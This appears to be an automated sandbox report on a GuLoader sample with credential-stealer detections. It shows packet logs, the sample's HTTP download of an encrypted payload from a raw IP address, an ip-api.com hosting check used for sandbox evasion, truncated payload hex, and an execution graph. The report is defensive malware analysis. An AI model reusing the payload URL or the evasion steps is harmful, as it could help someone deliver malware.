                          May 27, 2024 09:15:11.966460943 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:11.966556072 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:11.966572046 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:11.966572046 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:11.966620922 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:11.966689110 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:11.966718912 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:11.966867924 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170274019 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170372009 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170461893 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170514107 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170546055 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170584917 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170694113 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170734882 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170794964 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170872927 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170886040 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170922995 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.170970917 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.170988083 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171026945 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171036959 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171144009 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171155930 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171170950 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171221972 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171221972 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171313047 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171313047 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171416044 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171813011 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171933889 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.171962976 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.171991110 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172066927 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172096014 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172116041 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172221899 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172235012 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172287941 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172311068 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172353983 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172353983 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172367096 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172456980 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172480106 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172492027 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172503948 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172508955 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172559977 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172638893 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172698021 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172709942 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172718048 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172801018 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.172816992 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172863960 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172976971 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.172990084 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173089981 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173103094 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173132896 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173182964 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173211098 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173211098 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173338890 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173353910 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173463106 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173475027 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173485041 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173489094 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173507929 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173563957 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173588037 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173640013 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173640013 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173696995 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173710108 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173737049 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173820972 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.173821926 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173872948 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.173964024 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174073935 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174088001 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174182892 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174236059 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174251080 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174340963 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174381971 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174390078 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174401045 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174447060 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174485922 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174496889 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174575090 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174575090 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174606085 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174619913 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174623966 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174724102 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174731970 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174731970 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174741030 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174861908 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174875975 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174932957 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174935102 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174988031 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.174992085 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.174992085 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175088882 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175106049 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175120115 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175137997 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175220966 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175235033 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175302982 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175308943 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175354958 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175354958 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175467968 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175576925 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175590992 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175683975 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175693035 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175740957 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175796986 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:15:12.175822973 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:12.175995111 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:15:15.688504934 CEST5003280192.168.11.30208.95.112.1
                          May 27, 2024 09:15:15.787225962 CEST8050032208.95.112.1192.168.11.30
                          May 27, 2024 09:15:15.787427902 CEST5003280192.168.11.30208.95.112.1
                          May 27, 2024 09:15:15.790935040 CEST5003280192.168.11.30208.95.112.1
                          May 27, 2024 09:15:15.891424894 CEST8050032208.95.112.1192.168.11.30
                          May 27, 2024 09:15:15.933357954 CEST5003280192.168.11.30208.95.112.1
                          May 27, 2024 09:16:26.807048082 CEST8050032208.95.112.1192.168.11.30
                          May 27, 2024 09:16:26.807188034 CEST5003280192.168.11.30208.95.112.1
                          May 27, 2024 09:16:47.477433920 CEST8050032208.95.112.1192.168.11.30
                          May 27, 2024 09:17:00.675314903 CEST5003180192.168.11.30109.248.151.11
                          May 27, 2024 09:17:00.886801958 CEST8050031109.248.151.11192.168.11.30
                          May 27, 2024 09:17:00.887015104 CEST5003180192.168.11.30109.248.151.11
                          TimestampSource PortDest PortSource IPDest IP
                          May 27, 2024 09:15:15.552639008 CEST6102953192.168.11.301.1.1.1
                          May 27, 2024 09:15:15.653435946 CEST53610291.1.1.1192.168.11.30
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          May 27, 2024 09:15:15.552639008 CEST192.168.11.301.1.1.10xe9e8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          May 27, 2024 09:15:15.653435946 CEST1.1.1.1192.168.11.300xe9e8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                          • 109.248.151.11
                          • ip-api.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.11.3050031109.248.151.11807240C:\Users\user\Desktop\99200032052824.bat.exe
                          TimestampBytes transferredDirectionData
                          May 27, 2024 09:15:10.898099899 CEST178OUTGET /LZJRCXHEEshk185.bin HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                          Host: 109.248.151.11
                          Cache-Control: no-cache
                          May 27, 2024 09:15:11.112833977 CEST1289INHTTP/1.1 200 OK
                          Content-Type: application/octet-stream
                          Last-Modified: Mon, 27 May 2024 03:18:36 GMT
                          Accept-Ranges: bytes
                          ETag: "d437ea8fe4afda1:0"
                          Server: Microsoft-IIS/8.5
                          Date: Mon, 27 May 2024 07:15:11 GMT
                          Content-Length: 242240
                          Data Raw: 06 fe 8f ed 60 52 83 83 33 1a 58 91 7c 2f 47 33 1b a2 50 60 c3 2d 0b ab a6 89 8d 9a ca dd e1 f8 2f 8e 44 27 d9 77 21 94 6c a8 9d 89 3a 3f 5e 1c 1f 5c 30 fc 6b 89 32 f5 d8 59 52 c5 65 ab 07 18 49 5f 9f 0a ba ac 5a 76 c1 e4 f1 aa 60 5b 3c 37 e7 63 d7 b8 0f d5 f7 62 27 5a 17 1d 86 cb f8 b9 40 7a 32 a3 40 4e 38 20 a8 ce d5 22 20 0c c0 b1 34 c3 27 5d 6f 55 6e 40 9b b1 56 b6 09 8d 60 a6 58 72 72 a2 81 37 b8 87 15 ae 69 cd a7 e5 2a 73 00 8a 6f 82 ae 9c 92 d1 c3 42 d3 e1 68 07 cb 57 c6 03 48 5c c2 12 dd 10 f1 f1 9d ba 8b 35 c0 86 e8 5f 61 13 45 ca 91 02 59 68 72 56 dd 61 fb 71 ab ee f8 43 86 3b 83 ca 07 61 cf da 4d 97 44 a6 de 1c 6a f5 b3 5c ea 78 8a 89 f9 31 90 33 b8 21 5e 03 61 12 29 41 8c e2 a6 62 bb cd 2b 07 dd 1f 9e f5 3f e0 5b 47 3f 51 a5 ae cd 9c 61 fb 6c 9f f2 cd 28 8b 01 b9 28 a1 ec c4 d1 e4 1f 7b 00 85 e9 3f c2 39 58 7e 5b ff 9d 3e b2 ba 6a e5 17 24 a0 5b b6 1f a6 d7 f9 b1 76 d3 38 47 37 ca d9 9c 86 ac 83 cb 30 ad bb aa da 7b a6 0d 37 9d cc 21 5a b1 f0 25 6f 5e db 4c 60 dd 61 bb 11 50 43 57 30 71 [TRUNCATED]
                          Data Ascii: `R3X|/G3P`-/D'w!l:?^\0k2YReI_Zv`[<7cb'Z@z2@N8 " 4']oUn@V`Xrr7i*soBhWH\5_aEYhrVaqC;aMDj\x13!^a)Ab+?[G?Qal(({?9X~[>j$[v8G70{7!Z%o^L`aPCW0ql5+!^{efGr6uHm"0;d3gI*i*ZE*tNK4_36<'X5C H3X@;:]`'U%XRa`KKXx{b:ee..Y rsl&DMjIbaLla,"M[8*i0?0!T5qhG-xW';Wff/$FBW\8N"^ZQ=B`"S@w8>Xlu@R(wPFCP84H:Y>!Lt!F.Xxj<iXC~tNJrGc:*EWL0<ZSqtKPzdVl`@FbHCl_%mbJldrQr`F<CE4oLAJCTv"v_IK;| c5J!ZKCmh:R#b~O [TRUNCATED]
                          May 27, 2024 09:15:11.112972021 CEST1289INData Raw: a5 ed 1d 08 7c 12 6a be 4d f7 00 e5 05 28 5d cf 4a f9 54 78 d3 9d 1d 22 e6 a4 ad ca 53 1a 67 57 08 a7 88 a2 41 06 3d e6 e5 da ef 68 43 e9 b7 f9 da 84 63 e8 73 a8 2c b2 b1 0c e8 f2 af aa 1e c1 ea b0 eb 4d ab 3a 0f 69 25 3c 44 19 49 15 bf a2 a8 28
                          Data Ascii: |jM(]JTx"SgWA=hCcs,M:i%<DI(S}|j{*6Z?~(=/ER6N?1YZ-96t{4Ab5'e8.prky4me|ufV&-5\`@CA@'$"N}]c7!-da)
                          May 27, 2024 09:15:11.112987041 CEST1289INData Raw: cc 06 62 da 1d a9 48 2d 70 16 57 6c 63 ca cf ff d1 13 d0 fe a7 6a 7c 64 a7 19 3a 9b b6 34 93 2b 24 2d 47 cb 18 e4 09 f2 87 25 62 d1 62 dd 35 48 36 d1 30 34 84 57 5e c7 8b 0a 7e 2f e5 bd 6a 3f 3a db 89 0f 40 c9 f3 34 fd fc 4b bd 25 ad f9 54 9f a1
                          Data Ascii: bH-pWlcj|d:4+$-G%bb5H604W^~/j?:@4K%T"gz81eM11:Z6m"q|Xo`k|2*&c?%6Bh+D}R>.$T!2t6m"@~X2f}4X(9'4iz2
                          May 27, 2024 09:15:11.113080025 CEST1289INData Raw: 55 6d 25 1e 34 54 a2 18 e8 ce f6 62 4e fa 72 66 ef 07 00 89 bb 16 38 bc 71 d5 b7 72 81 86 d4 0e 89 b0 87 92 46 bb 14 e1 48 53 fa d0 c4 b1 05 7a da 6d 37 fe 95 20 a5 2f ba c2 2d 44 ac 58 8e a2 ce fd dd bd fd 88 a8 72 c5 1f a4 9f cd d5 6e 3d 74 36
                          Data Ascii: Um%4TbNrf8qrFHSzm7 /-DXrn=t6T/eKT(Uk4y_Eg?>-B&aHA66Uvx@;1'^Z*+&>~i@Ms*8K>3QkF-?\rk`+&
                          May 27, 2024 09:15:11.324342012 CEST1289INData Raw: 4e cd 52 e5 77 38 21 28 4c a4 2a ce e8 fc 92 16 69 30 5b 2d 45 cd ec fc 41 10 ad 57 6c 3c b9 60 04 01 65 c6 e2 6b 63 cb 31 3a 11 9b 1f 21 1c b0 0a 89 68 aa 25 8b d6 b2 42 14 66 6a f0 af 46 6d 46 e3 c4 06 0b 10 a9 89 c0 4a 1f ac 63 1c 15 58 43 23
                          Data Ascii: NRw8!(L*i0[-EAWl<`ekc1:!h%BfjFmFJcXC#1Nlv+_ln/r|@F>KPGfOPOM *KMXdv7b<nr]@/2fKP>@hI3.TibL40P'E2N^Pb
                          May 27, 2024 09:15:11.324438095 CEST1289INData Raw: be c5 6f 2c 77 a4 55 ef ce 3e 17 1d 25 3b 15 9c ef 7b 04 84 88 5d d5 de 4b 25 a8 57 bf 31 c7 2f 58 c0 c6 35 ac c7 c4 78 55 20 58 3f f1 35 de 65 f6 ce 88 f7 63 95 75 04 4a 0c 64 6f 5f 9f 81 b5 fd f3 bf 36 c9 aa c7 47 6a 23 1c 92 fd e0 f6 9e c1 a4
                          Data Ascii: o,wU>%;{]K%W1/X5xU X?5ecuJdo_6Gj#fKNXG4)U*i@-G]d8`hK51NvBjDmLgHj7hG1m%4w)Jze/*rRr`FIP'P:cO0>/WX
                          May 27, 2024 09:15:11.324537039 CEST1289INData Raw: 93 bd 3d e7 ec 89 ce e4 bd 97 27 7b ef 85 fd ae e4 05 fb bd aa 8c bc 80 cf a3 35 8f 14 82 68 e0 42 8c c1 2d 50 e9 ae 0d 5d 4e c9 2f a8 e2 80 2c 0b a6 94 c7 46 37 54 66 46 23 24 cc ea c8 bb 34 f7 54 a0 14 58 0a 45 d0 cc 03 04 2d 39 a9 cd b4 ad ac
                          Data Ascii: ='{5hB-P]N/,F7TfF#$4TXE-9I/-y;c{U>e:\&wz]I[W,&(bB45X?#icktOCdm6RjSL`2{G*MR9>u*07h0[<WL0Gndhc?wSvBT)IjD
                          May 27, 2024 09:15:11.324620008 CEST1289INData Raw: 8f 06 db f5 78 08 62 ab b2 82 32 d3 25 4b 0b 89 fc 60 d4 d0 22 e3 59 e3 20 e4 cf ce 5e a8 fc cf 72 73 2e 6f b5 27 00 07 44 19 e0 bb 4d 19 47 15 6a 43 c1 0b 0b 62 fb 4f 17 a2 f8 1d 61 a2 8d 49 6c c4 87 86 7e e2 58 69 06 8f db 05 12 04 86 cd c6 cd
                          Data Ascii: xb2%K`"Y ^rs.o'DMGjCbOaIl~Xi[cx4'cwT1Kh-|WRhUf-2TD{e/9F/-s9cXUL0%KMw\9W&X6Hzo4XO iNc#Y7a
                          May 27, 2024 09:15:11.324654102 CEST1289INData Raw: 74 e7 81 75 a3 4e 4b 1c 12 f3 0f f1 a1 b6 0c 33 c4 c8 98 30 b3 c0 12 bc e2 42 de 40 d9 ea e6 23 e5 dd e1 1c 68 91 0d 58 2e 89 ad 50 39 b0 0c 95 62 83 62 a6 d1 d5 f7 6e dc aa 07 70 82 25 e1 07 7f a0 2a 31 9f fc c1 c2 a8 68 13 4b 3d 08 ce dd 13 4b
                          Data Ascii: tuNK30B@#hX.P9bbnp%*1hK=K\x0;b:E".F 1r"k@DE9jCnALl:Y:[K1zgj0@ T{th>F-xPTf,;Wf!(
                          May 27, 2024 09:15:11.324786901 CEST1289INData Raw: 42 60 3d 62 45 5b 55 43 77 31 71 6c 11 ed df 8c 26 2b 84 e6 09 a3 8c 95 bd 3a 44 7f 65 10 46 45 ba 10 15 8c 97 8d 89 b5 75 3a 75 48 e7 96 ce 8b 19 93 ce d5 3b 1b d8 c1 f4 ba 30 d9 bf dc 1d c4 0a e1 93 65 33 82 a9 4d c4 df e4 da 49 d4 67 df 15 ca
                          Data Ascii: B`=bE[UCw1ql&+:DeFEu:uH;0e3MIgm&zC*tNK<YE36=E A6##hX.8:]`&'uq-1a3eK=Kd5X{R9:%B@..",o'D_JCaK
                          May 27, 2024 09:15:11.324800968 CEST1289INData Raw: 23 dd 1f 60 19 38 e0 7b 4a 7f 51 a5 70 cc a5 64 f9 6c 9f ce c8 28 8b 01 81 d5 5c 17 3b 2f e8 1e 7b 20 84 e9 1f c6 61 a6 72 5a ff 63 32 b3 ba 96 e9 57 a1 2e 32 99 05 58 38 06 91 76 d3 28 47 1d c1 e9 9e 86 df 81 cb 20 a0 bb aa cb 5b a6 0d 37 9d 32
                          Data Ascii: #`8{JQpdl(\;/{ arZc2W.2X8v(G [72/w~"^L1ewTCW0m(5Y!TkfgrgyOm1o<;Mj2WkI*c!@ZE&qNA>SA2L-Az#n3(@3+:{|W%


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.11.3050032208.95.112.1807240C:\Users\user\Desktop\99200032052824.bat.exe
                          TimestampBytes transferredDirectionData
                          May 27, 2024 09:15:15.790935040 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          May 27, 2024 09:15:15.891424894 CEST175INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 07:15:15 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:5
                          Start time:03:14:46
                          Start date:27/05/2024
                          Path:C:\Users\user\Desktop\99200032052824.bat.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\99200032052824.bat.exe"
                          Imagebase:0x400000
                          File size:543'903 bytes
                          MD5 hash:085DE7AC75BBD791C1B1F979FE8FF78C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:03:15:00
                          Start date:27/05/2024
                          Path:C:\Users\user\Desktop\99200032052824.bat.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\99200032052824.bat.exe"
                          Imagebase:0x400000
                          File size:543'903 bytes
                          MD5 hash:085DE7AC75BBD791C1B1F979FE8FF78C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Reset < >

                            Execution Graph

                            Execution Coverage:21.9%
                            Dynamic/Decrypted Code Coverage:15.9%
                            Signature Coverage:19.9%
                            Total number of Nodes:1522
                            Total number of Limit Nodes:42
                            execution_graph 3953 402340 3960 402acb 3953->3960 3956 402acb 17 API calls 3957 40235a 3956->3957 3958 402acb 17 API calls 3957->3958 3959 402364 GetPrivateProfileStringA 3958->3959 3961 402ad7 3960->3961 3966 405fc2 3961->3966 3964 402351 3964->3956 3970 405fcf 3966->3970 3967 4061f1 3968 402af8 3967->3968 3999 405fa0 lstrcpynA 3967->3999 3968->3964 3983 40620a 3968->3983 3970->3967 3971 4061cb lstrlenA 3970->3971 3974 405fc2 10 API calls 3970->3974 3976 4060e7 GetSystemDirectoryA 3970->3976 3977 4060fa GetWindowsDirectoryA 3970->3977 3978 40620a 5 API calls 3970->3978 3979 40612e SHGetSpecialFolderLocation 3970->3979 3980 405fc2 10 API calls 3970->3980 3981 406174 lstrcatA 3970->3981 3992 405e87 3970->3992 3997 405efe wsprintfA 3970->3997 3998 405fa0 lstrcpynA 3970->3998 3971->3970 3974->3971 3976->3970 3977->3970 3978->3970 3979->3970 3982 406146 SHGetPathFromIDListA CoTaskMemFree 3979->3982 3980->3970 3981->3970 3982->3970 3990 406216 3983->3990 3984 40627e 3985 406282 CharPrevA 3984->3985 3987 40629d 3984->3987 3985->3984 3986 406273 CharNextA 3986->3984 3986->3990 3987->3964 3989 406261 CharNextA 3989->3990 3990->3984 3990->3986 3990->3989 3991 40626e CharNextA 3990->3991 4004 405963 3990->4004 3991->3986 4000 405e26 3992->4000 3995 405eea 3995->3970 3996 405ebb RegQueryValueExA RegCloseKey 3996->3995 3997->3970 3998->3970 3999->3968 4001 405e35 4000->4001 4002 405e39 4001->4002 4003 405e3e RegOpenKeyExA 4001->4003 4002->3995 4002->3996 4003->4002 4005 405969 4004->4005 4006 40597c 4005->4006 4007 40596f CharNextA 4005->4007 4006->3990 4007->4005 5010 73a32ba3 5011 73a32bbb 5010->5011 5012 73a31534 2 API calls 5011->5012 5013 73a32bd6 5012->5013 5014 401d41 GetDlgItem GetClientRect 5015 402acb 17 API calls 5014->5015 5016 401d71 LoadImageA SendMessageA 5015->5016 5017 401d8f DeleteObject 5016->5017 5018 402957 5016->5018 5017->5018 5019 404a44 GetDlgItem GetDlgItem 5020 404a96 7 API calls 5019->5020 5027 404cae 5019->5027 5021 404b39 DeleteObject 5020->5021 5022 404b2c SendMessageA 5020->5022 5023 404b42 5021->5023 5022->5021 5025 404b79 5023->5025 5026 405fc2 17 API calls 5023->5026 5024 404d92 5029 404e3e 5024->5029 5034 404ca1 5024->5034 5039 404deb SendMessageA 5024->5039 5028 40403f 18 API calls 5025->5028 5030 404b5b SendMessageA SendMessageA 5026->5030 5027->5024 5051 404d1f 5027->5051 5072 404992 SendMessageA 5027->5072 5033 404b8d 5028->5033 5031 404e50 5029->5031 5032 404e48 SendMessageA 5029->5032 5030->5023 5042 404e62 ImageList_Destroy 5031->5042 5043 404e69 5031->5043 5048 404e79 5031->5048 5032->5031 5038 40403f 18 API calls 5033->5038 5035 4040a6 8 API calls 5034->5035 5041 405034 5035->5041 5036 404d84 SendMessageA 5036->5024 5052 404b9b 5038->5052 5039->5034 5040 404e00 SendMessageA 5039->5040 5045 404e13 5040->5045 5042->5043 5046 404e72 GlobalFree 5043->5046 5043->5048 5044 404fe8 5044->5034 5049 404ffa ShowWindow GetDlgItem ShowWindow 5044->5049 5056 404e24 SendMessageA 5045->5056 5046->5048 5047 404c6f GetWindowLongA SetWindowLongA 5050 404c88 5047->5050 5048->5044 5066 404eb4 5048->5066 5077 404a12 5048->5077 5049->5034 5053 404ca6 5050->5053 5054 404c8e ShowWindow 5050->5054 5051->5024 5051->5036 5052->5047 5055 404bea SendMessageA 5052->5055 5057 404c69 5052->5057 5060 404c26 SendMessageA 5052->5060 5061 404c37 SendMessageA 5052->5061 5071 404074 SendMessageA 5053->5071 5070 404074 SendMessageA 5054->5070 5055->5052 5056->5029 5057->5047 5057->5050 5060->5052 5061->5052 5063 404fbe InvalidateRect 5063->5044 5064 404fd4 5063->5064 5086 40494d 5064->5086 5065 404ee2 SendMessageA 5069 404ef8 5065->5069 5066->5065 5066->5069 5068 404f6c SendMessageA SendMessageA 5068->5069 5069->5063 5069->5068 5070->5034 5071->5027 5073 4049f1 SendMessageA 5072->5073 5074 4049b5 GetMessagePos ScreenToClient SendMessageA 5072->5074 5075 4049e9 5073->5075 5074->5075 5076 4049ee 5074->5076 5075->5051 5076->5073 5089 405fa0 lstrcpynA 5077->5089 5079 404a25 5090 405efe wsprintfA 5079->5090 5081 404a2f 5082 40140b 2 API calls 5081->5082 5083 404a38 5082->5083 5091 405fa0 lstrcpynA 5083->5091 5085 404a3f 5085->5066 5092 404888 5086->5092 5088 404962 5088->5044 5089->5079 5090->5081 5091->5085 5093 40489e 5092->5093 5094 405fc2 17 API calls 5093->5094 5095 404902 5094->5095 5096 405fc2 17 API calls 5095->5096 5097 40490d 5096->5097 5098 405fc2 17 API calls 5097->5098 5099 404923 lstrlenA wsprintfA SetDlgItemTextA 5098->5099 5099->5088 4348 401746 4349 402acb 17 API calls 4348->4349 4350 40174d 4349->4350 4354 405b68 4350->4354 4352 401754 4353 405b68 2 API calls 4352->4353 4353->4352 